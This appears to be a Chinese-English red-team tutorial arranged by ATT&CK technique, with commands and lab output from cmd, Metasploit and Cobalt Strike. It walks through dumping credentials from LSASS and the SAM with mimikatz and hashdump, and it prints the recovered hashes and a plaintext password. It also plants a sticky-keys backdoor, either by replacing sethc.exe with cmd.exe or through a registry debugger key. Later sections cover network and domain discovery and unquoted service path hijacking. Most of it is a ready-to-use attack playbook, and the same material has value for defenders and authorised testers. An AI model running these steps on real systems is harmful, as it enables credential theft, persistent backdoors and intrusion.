Credential Dumping(凭证窃取)

Dump credentials from LSASS(从LSASS中窃取凭证)

实现原理：

This technique injects into the LSASS.exe process and scrapes its memory for plaintext passwords of logged on users. You must do this from a high integrity process. 
注入lsass .exe进程，并从其内存中提取登录用户的明文密码

msf下操作：

use mimikatz

wdigest(获取WDigest凭据)

msv （获取msv凭据（hash））

kerberos （获取kerberos）

meterpreter > use mimikatz 
Loading extension mimikatz...Success.
meterpreter > wdigest 
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;996     Negotiate  NT AUTHORITY     NETWORK SERVICE   
0;53216   NTLM                                          
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     
0;999     NTLM       WORKGROUP        ROOT-5DE52AC98B$  
0;146131  NTLM       ROOT-5DE52AC98B  Administrator     123456
meterpreter > msv
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving msv credentials
msv credentials
===============
AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;146131  NTLM       ROOT-5DE52AC98B  Administrator     lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;996     Negotiate  NT AUTHORITY     NETWORK SERVICE   lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 }
0;53216   NTLM                                          n.s. (Credentials KO)
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;999     NTLM       WORKGROUP        ROOT-5DE52AC98B$  n.s. (Credentials KO)
meterpreter > kerberos 
[!] Not currently running as SYSTEM
[*] Attempting to getprivs ...
[+] Got SeDebugPrivilege.
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;996     Negotiate  NT AUTHORITY     NETWORK SERVICE   
0;53216   NTLM                                          
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     
0;999     NTLM       WORKGROUP        ROOT-5DE52AC98B$  
0;146131  NTLM       ROOT-5DE52AC98B  Administrator     123456

cs下操作

logonpasswords

mimikatz !sekurlsa::logonpasswords

mimikatz !sekurlsa::msv

mimikatz !sekurlsa::kerberos

mimikatz !sekurlsa::wdigest

beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 630354 bytes
[+] received output:
Authentication Id : 0 ; 338316 (00000000:0005298c)
Session           : Interactive from 0
User Name         : Administrator
Domain            : ROOT-5DE52AC98B
Logon Server      : ROOT-5DE52AC98B
Logon Time        : 2019-9-4 19:18:26
SID               : S-1-5-21-1911985068-4225083820-4011728908-500
    msv :   
     [00000002] Primary
     * Username : Administrator
     * Domain   : ROOT-5DE52AC98B
     * LM       : 44efce164ab921caaad3b435b51404ee
     * NTLM     : 32ed87bdb5fdc5e9cba88547376818d4
     * SHA1     : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
    wdigest :   
     * Username : Administrator
     * Domain   : ROOT-5DE52AC98B
     * Password : 123456
    kerberos :  
     * Username : Administrator
     * Domain   : ROOT-5DE52AC98B
     * Password : 123456
    ssp :   
    credman :   
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : NETWORK SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2019-9-4 19:14:12
SID               : S-1-5-20
    msv :   
     [00000002] Primary
     * Username : ROOT-5DE52AC98B$
     * Domain   : WORKGROUP
     * LM       : aad3b435b51404eeaad3b435b51404ee
     * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0
     * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
    wdigest :   
     * Username : ROOT-5DE52AC98B$
     * Domain   : WORKGROUP
     * Password : (null)
    kerberos :  
     * Username : root-5de52ac98b$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :   
    credman :   
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2019-9-4 19:14:12
SID               : S-1-5-19
    msv :   
    wdigest :   
    kerberos :  
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :   
    credman :   
Authentication Id : 0 ; 53331 (00000000:0000d053)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2019-9-4 19:14:12
SID               : 
    msv :   
    wdigest :   
    kerberos :  
    ssp :   
    credman :   
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : ROOT-5DE52AC98B$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2019-9-4 19:14:12
SID               : S-1-5-18
    msv :   
    wdigest :   
    kerberos :  
     * Username : root-5de52ac98b$
     * Domain   : WORKGROUP
     * Password : (null)
    ssp :   
    credman :   

Dumps hashes from the SAM Hive file（从sam文件里面读取hash）

实现原理：

The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required. 
sam文件存放着hash，然后读取该文件进行获得凭证

msf下操作

hashdump （普通hash获取）

run hashdump

post/windows/gather/credentials/domain_hashdump （获取域hash）

meterpreter > hashdump 
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:1dce4321e5283c3e841070331873c406:085f84e35a1bfb09ca65d008cc988cae:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_ROOT-5DE52AC98B:1003:406eafe671e3ac72ddb9179ad9a2204a:4fa4e3f7ef6f5dc7e1b129caab134cbd:::
IWAM_ROOT-5DE52AC98B:1004:53aacf61b38888da87c793e8c36cb74a:14ba2ea13539973d3f0be627e43ff408:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:7490f8cea3cd28b37717a5d4be375404:::
meterpreter > run hashdump (需要系统权限)
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY be7ba5c5d5c67d878cd0845b2b4d1027...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed: Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
msf5 post(windows/gather/credentials/domain_hashdump) > exploit 
[*] Session has Admin privs
[-] This does not appear to be an AD Domain Controller
[*] Post module execution completed

cs下操作

hashdump

mimikatz !lsadump::sam

beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 63557 bytes
[+] received password hashes:
Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
ASPNET:1006:1dce4321e5283c3e841070331873c406:085f84e35a1bfb09ca65d008cc988cae:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_ROOT-5DE52AC98B:1003:406eafe671e3ac72ddb9179ad9a2204a:4fa4e3f7ef6f5dc7e1b129caab134cbd:::
IWAM_ROOT-5DE52AC98B:1004:53aacf61b38888da87c793e8c36cb74a:14ba2ea13539973d3f0be627e43ff408:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:7490f8cea3cd28b37717a5d4be375404:::
beacon> mimikatz !lsadump::sam
[*] Tasked beacon to run mimikatz's !lsadump::sam command
[+] host called home, sent: 841287 bytes
[+] received output:
Domain : ROOT-5DE52AC98B
SysKey : be7ba5c5d5c67d878cd0845b2b4d1027
Local SID : S-1-5-21-1911985068-4225083820-4011728908
SAMKey : 5dfe2beb57a9d468ed8a72c51c7334ff
RID  : 000001f4 (500)
User : Administrator
  Hash LM  : 44efce164ab921caaad3b435b51404ee
  Hash NTLM: 32ed87bdb5fdc5e9cba88547376818d4
RID  : 000001f5 (501)
User : Guest
RID  : 000003e9 (1001)
User : SUPPORT_388945a0
  Hash NTLM: 7490f8cea3cd28b37717a5d4be375404
RID  : 000003eb (1003)
User : IUSR_ROOT-5DE52AC98B
  Hash LM  : 406eafe671e3ac72ddb9179ad9a2204a
  Hash NTLM: 4fa4e3f7ef6f5dc7e1b129caab134cbd
RID  : 000003ec (1004)
User : IWAM_ROOT-5DE52AC98B
  Hash LM  : 53aacf61b38888da87c793e8c36cb74a
  Hash NTLM: 14ba2ea13539973d3f0be627e43ff408
RID  : 000003ee (1006)
User : ASPNET
  Hash LM  : 1dce4321e5283c3e841070331873c406
  Hash NTLM: 085f84e35a1bfb09ca65d008cc988cae

Query Registry(注册表查询)

Check terminal services（检测终端服务）

原理：

Check for the current registry value for terminal services, if it's 0, then terminal services are enabled. If it's 1, then they're disabled
从注册表中的键值检测是否开启终端服务，如果是0，则为开启，为1则是关闭

terminal（cmd）下操作：

C:\Documents and Settings\Administrator\����>reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0

msf下操作：

reg queryval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" -v fDenyTSConnections

post/windows/gather/enum_termserv (不好用)

meterpreter > reg queryval -k "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" -v fDenyTSConnections
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
Name: fDenyTSConnections
Type: REG_DWORD
Data: 0
msf5 post(windows/gather/enum_termserv) > exploit 
[*] Doing enumeration for S-1-5-21-1911985068-4225083820-4011728908-500
[*] Post module execution completed

cs下操作

shell reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

beacon> shell reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
[*] Tasked beacon to run: reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
[+] host called home, sent: 132 bytes
[+] received output:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x1

Accessibility Features(易访问特征)

Point sethc.exe file to cmd.exe（使用sethc启动cmd）

原理：

Modify the registry to point the sethc.exe file to point to cmd.exe
修改注册表使sethc指向cmd，然后五次shift后就可以调出cmd，当然你也可以使用这种方法去激活一个msf的shell

terminal下操作：

REG ADD "HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ
/d "C:\windows\system32\cmd.exe" /f

C:\Documents and Settings\Administrator>REG ADD "HKLM\SOFTWARE\Microsoft\Windows
 NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ
 /d "C:\windows\system32\cmd.exe" /f
操作成功完成。

msf下操作

post/windows/manage/sticky_keys

msf5 post(windows/manage/sticky_keys) > exploit 
[+] Session has administrative rights, proceeding.
[+] 'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing SHIFT 5 times.
[*] Post module execution completed

cs下操作

shell REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

beacon> shell REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
[*] Tasked beacon to run: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
[+] host called home, sent: 187 bytes
[+] received output:
操作成功完成。

Replace real sethc.exe with a copy of cmd.exe(用cmd的副本代替sethc)

使用takeown.exe获取系统ALC权限，然后替换

terminal下操作：

takeown.exe C:\Windows\system32\sethc.exe

del C:\Windows\system32\sethc.exe

copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe

C:\Documents and Settings\Administrator>takeown.exe C:\Windows\system32\sethc.ex
e
错误: 无效参数/选项 - 'C:\Windows\system32\sethc.exe'。
键入 "TAKEOWN /?" 以了解用法。
C:\Documents and Settings\Administrator>del C:\Windows\system32\sethc.exe
C:\Documents and Settings\Administrator>copy C:\Windows\system32\cmd.exe C:\Wind
ows\system32\sethc.exe
覆盖 C:\Windows\system32\sethc.exe 吗? (Yes/No/All): yes
已复制         1 个文件。

cs下操作：

shell takeown.exe C:\Windows\system32\sethc.exe

shell del C:\Windows\system32\sethc.exe

shell copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe

beacon> shell takeown.exe C:\Windows\system32\sethc.exe
[*] Tasked beacon to run: takeown.exe C:\Windows\system32\sethc.exe
[+] host called home, sent: 72 bytes
[+] received output:
错误: 无效参数/选项 - 'C:\Windows\system32\sethc.exe'。
键入 "TAKEOWN /?" 以了解用法。
beacon> shell del C:\Windows\system32\sethc.exe
[*] Tasked beacon to run: del C:\Windows\system32\sethc.exe
beacon> shell copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe
[*] Tasked beacon to run: copy C:\Windows\system32\cmd.exe C:\Windows\system32\sethc.exe
[+] host called home, sent: 157 bytes
[+] received output:
已复制         1 个文件。

System Network Configuration Discovery（系统网络配置发现）

Get network information（发现网络信息）

terminal下操作：

ipconfig /all

C:\Documents and Settings\Administrator>ipconfig /all
Windows IP Configuration
   Host Name . . . . . . . . . . . . : root-5de52ac98b
   Primary Dns Suffix  . . . . . . . :
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-D4-66-73
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IP Address. . . . . . . . . . . . : 192.168.2.114
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.2.1
   DHCP Server . . . . . . . . . . . : 192.168.2.1
   DNS Servers . . . . . . . . . . . : 192.168.2.1
   Lease Obtained. . . . . . . . . . : 2019年9月4日 19:14:12
   Lease Expires . . . . . . . . . . : 2019年9月5日 19:14:12
C:\Documents and Settings\Administrator>

msf下操作：

post/windows/gather/enum_domains

msf5 post(windows/gather/enum_domains) > exploit 
[*] Enumerating DCs for WORKGROUP
[-] No Domain Controllers found...
[*] Post module execution completed

cs下操作：

shell ipconfig /all

beacon> shell ipconfig /all
[*] Tasked beacon to run: ipconfig /all
[+] host called home, sent: 44 bytes
[+] received output:
Windows IP Configuration
   Host Name . . . . . . . . . . . . : root-5de52ac98b
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-D4-66-73
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   IP Address. . . . . . . . . . . . : 192.168.2.114
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.2.1
   DHCP Server . . . . . . . . . . . : 192.168.2.1
   DNS Servers . . . . . . . . . . . : 192.168.2.1
   Lease Obtained. . . . . . . . . . : 2019年9月4日 19:14:12
   Lease Expires . . . . . . . . . . : 2019年9月5日 19:14:12

Get ARP table(获取arp表)

terminal下操作

arp -a

router print

C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.2.114 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.2.1           fc-7c-02-de-0e-c8     dynamic
  192.168.2.107         b4-6b-fc-47-ad-60     dynamic

msf下操作：

router

meterpreter > route 
IPv4 network routes
===================
    Subnet           Netmask          Gateway        Metric  Interface
    ------           -------          -------        ------  ---------
    0.0.0.0          0.0.0.0          192.168.2.1    10      65539
    127.0.0.0        255.0.0.0        127.0.0.1      1       1
    192.168.2.0      255.255.255.0    192.168.2.114  10      65539
    192.168.2.114    255.255.255.255  127.0.0.1      10      1
    192.168.2.255    255.255.255.255  192.168.2.114  10      65539
    224.0.0.0        240.0.0.0        192.168.2.114  10      65539
    255.255.255.255  255.255.255.255  192.168.2.114  1       65539

cs下操作：

arp -a

beacon> shell arp -a
[*] Tasked beacon to run: arp -a
[+] host called home, sent: 37 bytes
[+] received output:
Interface: 192.168.2.114 --- 0x10003
  Internet Address      Physical Address      Type
  192.168.2.1           fc-7c-02-de-0e-c8     dynamic   
  192.168.2.107         b4-6b-fc-47-ad-60     dynamic

Dump MAC, IP addresses and codes(获取mac、ip地址和其描述性代码)

用于获取计算机的MAC和IP地址以及一些描述性代码(0x1C表示一个域控制器)

termainal下操作：

nbtstat -a ip

C:\Documents and Settings\Administrator>nbtstat -a ip
本地连接:
Node IpAddress: [192.168.2.114] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    ROOT-5DE52AC98B<00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    ROOT-5DE52AC98B<20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered
    WORKGROUP      <1D>  UNIQUE      Registered
    ..__MSBROWSE__.<01>  GROUP       Registered
    MAC Address = 00-0C-29-D4-66-73

cs下操作：

shell c:\windows\system32\nbtstat.exe -a ip

beacon> shell c:\windows\system32\nbtstat.exe -a 192.168.2.114
[*] Tasked beacon to run: c:\windows\system32\nbtstat.exe -a 192.168.2.114
[+] host called home, sent: 79 bytes
[+] received output:
本地连接:
Node IpAddress: [192.168.2.114] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    ROOT-5DE52AC98B<00>  UNIQUE      Registered 
    WORKGROUP      <00>  GROUP       Registered 
    ROOT-5DE52AC98B<20>  UNIQUE      Registered 
    WORKGROUP      <1E>  GROUP       Registered 
    WORKGROUP      <1D>  UNIQUE      Registered 
    ..__MSBROWSE__.<01>  GROUP       Registered 
    MAC Address = 00-0C-29-D4-66-73

Remote System Discovery(远程系统发现)

Get the list of domain computers（获取域主机列表）

terminal下操作：

net group "Domain Computers" /domain

C:\Documents and Settings\Administrator>net group "Domain Computers" /domain
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在，或无法联系。

msf下操作：

post/windows/gather/enum_ad_computers

post/windows/gather/enum_computers

msf5 post(windows/gather/enum_ad_computers) > exploit 
[-] Unable to find the domain to query.
[*] Post module execution completed
msf5 post(windows/gather/enum_computers) > exploit 
[*] Running module against ROOT-5DE52AC98B
[-] This host is not part of a domain.
[*] Post module execution completed

cs下操作：

shell net group "Domain Computers" /domain

beacon> shell net group "Domain Computers" /domain
[*] Tasked beacon to run: net group "Domain Computers" /domain
[+] host called home, sent: 67 bytes
[+] received output:
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在，或无法联系

Get the list of domain controllers(获取域控列表)

terminal下操作：

net group "Domain Controllers" /domain[:DOMAIN]

C:\Documents and Settings\Administrator>net group "Domain Controllers" /domain
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在，或无法联系

cs下操作：

shell net group "Domain Controllers" /domain

beacon> shell net group "Domain Controllers" /domain
[*] Tasked beacon to run: net group "Domain Controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
这项请求将在域 WORKGROUP 的域控制器处理。
发生系统错误 1355。
指定的域不存在，或无法联系。

Display trust relationship with domain controller(显示域信任关系)

terminal下操作：

nltest /dclist

Display the active directory login server of the workstation(显示ad域工作组的登录器)

terminal下操作：

echo %LOGONSERVER%

C:\Documents and Settings\Administrator>echo %LOGONSERVER%
\\ROOT-5DE52AC98B

cs下操作：

shell echo %LOGONSERVER%

beacon> shell echo %LOGONSERVER%
[*] Tasked beacon to run: echo %LOGONSERVER%
[+] host called home, sent: 49 bytes
[+] received output:
\\ROOT-5DE52AC98B

System Owner/User Discovery（系统用户发现）

Get user information（获取用户信息）

terminal下操作：

whoami /all /fo list

C:\Documents and Settings\Administrator>whoami
root-5de52ac98b\administrator
C:\Documents and Settings\Administrator>whoami /all
用户信息
----------------
用户名                        SID
============================= =============================================
root-5de52ac98b\administrator S-1-5-21-1911985068-4225083820-4011728908-500
组信息
-----------------
组名                             类型   SID          属性
================================ ====== ============ ===========================
===============
Everyone                         已知组 S-1-1-0      必需的组, 启用于默认, 启用
的组
BUILTIN\Administrators           别名   S-1-5-32-544 必需的组, 启用于默认, 启用
的组, 组的所有者
BUILTIN\Users                    别名   S-1-5-32-545 必需的组, 启用于默认, 启用
的组
NT AUTHORITY\INTERACTIVE         已知组 S-1-5-4      必需的组, 启用于默认, 启用
的组
NT AUTHORITY\Authenticated Users 已知组 S-1-5-11     必需的组, 启用于默认, 启用
的组
NT AUTHORITY\This Organization   已知组 S-1-5-15     必需的组, 启用于默认, 启用
的组
LOCAL                            已知组 S-1-2-0      必需的组, 启用于默认, 启用
的组
NT AUTHORITY\NTLM Authentication 已知组 S-1-5-64-10  必需的组, 启用于默认, 启用
的组
特权信息
----------------------
特权名                          描述                       状态
=============================== ========================== ======
SeLockMemoryPrivilege           内存中锁定页面             已禁用
SeChangeNotifyPrivilege         跳过遍历检查               已启用
SeSecurityPrivilege             管理审核和安全日志         已禁用
SeBackupPrivilege               备份文件和目录             已禁用
SeRestorePrivilege              还原文件和目录             已禁用
SeSystemtimePrivilege           更改系统时间               已禁用
SeShutdownPrivilege             关闭系统                   已禁用
SeRemoteShutdownPrivilege       从远程系统强制关机         已禁用
SeTakeOwnershipPrivilege        取得文件或其他对象的所有权 已禁用
SeDebugPrivilege                调试程序                   已禁用
SeSystemEnvironmentPrivilege    修改固件环境值             已禁用
SeSystemProfilePrivilege        配置系统性能               已禁用
SeProfileSingleProcessPrivilege 配置单一进程               已禁用
SeIncreaseBasePriorityPrivilege 增加计划优先级             已禁用
SeLoadDriverPrivilege           装载和卸载设备驱动程序     已禁用
SeCreatePagefilePrivilege       创建页面文件               已禁用
SeIncreaseQuotaPrivilege        调整进程的内存配额         已禁用
SeUndockPrivilege               从扩展坞中取出计算机       已禁用
SeManageVolumePrivilege         执行卷维护任务             已禁用
SeImpersonatePrivilege          身份验证后模拟客户端       已启用
SeCreateGlobalPrivilege         创建全局对象               已启用
C:\Documents and Settings\Administrator>whoami /all /fo list
用户信息
----------------
用户名: root-5de52ac98b\administrator
SID:    S-1-5-21-1911985068-4225083820-4011728908-500
组信息
-----------------
组名: Everyone
类型: 已知组
SID:  S-1-1-0
属性: 必需的组, 启用于默认, 启用的组
组名: BUILTIN\Administrators
类型: 别名
SID:  S-1-5-32-544
属性: 必需的组, 启用于默认, 启用的组, 组的所有者
组名: BUILTIN\Users
类型: 别名
SID:  S-1-5-32-545
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\INTERACTIVE
类型: 已知组
SID:  S-1-5-4
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\Authenticated Users
类型: 已知组
SID:  S-1-5-11
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\This Organization
类型: 已知组
SID:  S-1-5-15
属性: 必需的组, 启用于默认, 启用的组
组名: LOCAL
类型: 已知组
SID:  S-1-2-0
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\NTLM Authentication
类型: 已知组
SID:  S-1-5-64-10
属性: 必需的组, 启用于默认, 启用的组
特权信息
----------------------
特权名: SeLockMemoryPrivilege
描述:   内存中锁定页面
状态:   已禁用
特权名: SeChangeNotifyPrivilege
描述:   跳过遍历检查
状态:   已启用
特权名: SeSecurityPrivilege
描述:   管理审核和安全日志
状态:   已禁用
特权名: SeBackupPrivilege
描述:   备份文件和目录
状态:   已禁用
特权名: SeRestorePrivilege
描述:   还原文件和目录
状态:   已禁用
特权名: SeSystemtimePrivilege
描述:   更改系统时间
状态:   已禁用
特权名: SeShutdownPrivilege
描述:   关闭系统
状态:   已禁用
特权名: SeRemoteShutdownPrivilege
描述:   从远程系统强制关机
状态:   已禁用
特权名: SeTakeOwnershipPrivilege
描述:   取得文件或其他对象的所有权
状态:   已禁用
特权名: SeDebugPrivilege
描述:   调试程序
状态:   已禁用
特权名: SeSystemEnvironmentPrivilege
描述:   修改固件环境值
状态:   已禁用
特权名: SeSystemProfilePrivilege
描述:   配置系统性能
状态:   已禁用
特权名: SeProfileSingleProcessPrivilege
描述:   配置单一进程
状态:   已禁用
特权名: SeIncreaseBasePriorityPrivilege
描述:   增加计划优先级
状态:   已禁用
特权名: SeLoadDriverPrivilege
描述:   装载和卸载设备驱动程序
状态:   已禁用
特权名: SeCreatePagefilePrivilege
描述:   创建页面文件
状态:   已禁用
特权名: SeIncreaseQuotaPrivilege
描述:   调整进程的内存配额
状态:   已禁用
特权名: SeUndockPrivilege
描述:   从扩展坞中取出计算机
状态:   已禁用
特权名: SeManageVolumePrivilege
描述:   执行卷维护任务
状态:   已禁用
特权名: SeImpersonatePrivilege
描述:   身份验证后模拟客户端
状态:   已启用
特权名: SeCreateGlobalPrivilege
描述:   创建全局对象
状态:   已启用

msf下操作：

getuid

meterpreter > getuid
Server username: ROOT-5DE52AC98B\Administrator

cs下操作：

shell whoami /all /fo list

beacon> shell whoami /all /fo list
[*] Tasked beacon to run: whoami /all /fo list
[+] host called home, sent: 51 bytes
[+] received output:
用户信息
----------------
用户名: root-5de52ac98b\administrator
SID:    S-1-5-21-1911985068-4225083820-4011728908-500
组信息
-----------------
组名: Everyone
类型: 已知组
SID:  S-1-1-0
属性: 必需的组, 启用于默认, 启用的组
组名: BUILTIN\Administrators
类型: 别名
SID:  S-1-5-32-544
属性: 必需的组, 启用于默认, 启用的组, 组的所有者
组名: BUILTIN\Users
类型: 别名
SID:  S-1-5-32-545
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\INTERACTIVE
类型: 已知组
SID:  S-1-5-4
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\Authenticated Users
类型: 已知组
SID:  S-1-5-11
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\This Organization
类型: 已知组
SID:  S-1-5-15
属性: 必需的组, 启用于默认, 启用的组
组名: LOCAL
类型: 已知组
SID:  S-1-2-0
属性: 必需的组, 启用于默认, 启用的组
组名: NT AUTHORITY\NTLM Authentication
类型: 已知组
SID:  S-1-5-64-10
属性: 必需的组, 启用于默认, 启用的组
特权信息
----------------------
特权名: SeLockMemoryPrivilege
描述:   内存中锁定页面
状态:   已禁用
特权名: SeChangeNotifyPrivilege
描述:   跳过遍历检查
状态:   已启用
特权名: SeSecurityPrivilege
描述:   管理审核和安全日志
状态:   已禁用
特权名: SeBackupPrivilege
描述:   备份文件和目录
状态:   已禁用
特权名: SeRestorePrivilege
描述:   还原文件和目录
状态:   已禁用
特权名: SeSystemtimePrivilege
描述:   更改系统时间
状态:   已禁用
特权名: SeShutdownPrivilege
描述:   关闭系统
状态:   已禁用
特权名: SeRemoteShutdownPrivilege
描述:   从远程系统强制关机
状态:   已禁用
特权名: SeTakeOwnershipPrivilege
描述:   取得文件或其他对象的所有权
状态:   已禁用
特权名: SeDebugPrivilege
描述:   调试程序
状态:   已禁用
特权名: SeSystemEnvironmentPrivilege
描述:   修改固件环境值
状态:   已禁用
特权名: SeSystemProfilePrivilege
描述:   配置系统性能
状态:   已禁用
特权名: SeProfileSingleProcessPrivilege
描述:   配置单一进程
状态:   已禁用
特权名: SeIncreaseBasePriorityPrivilege
描述:   增加计划优先级
状态:   已禁用
特权名: SeLoadDriverPrivilege
描述:   装载和卸载设备驱动程序
状态:   已禁用
特权名: SeCreatePagefilePrivilege
描述:   创建页面文件
状态:   已禁用
特权名: SeIncreaseQuotaPrivilege
描述:   调整进程的内存配额
状态:   已禁用
特权名: SeUndockPrivilege
描述:   从扩展坞中取出计算机
状态:   已禁用
特权名: SeManageVolumePrivilege
描述:   执行卷维护任务
状态:   已禁用
特权名: SeImpersonatePrivilege
描述:   身份验证后模拟客户端
状态:   已启用
特权名: SeCreateGlobalPrivilege
描述:   创建全局对象
状态:   已启用

Path Interception(路径劫持)

原理：

在服务路径权限不对或者配置错误时会被攻击者进行提权操作
Service paths (stored in Windows Registry keys) [2] and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). [3] An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. [4] [5]
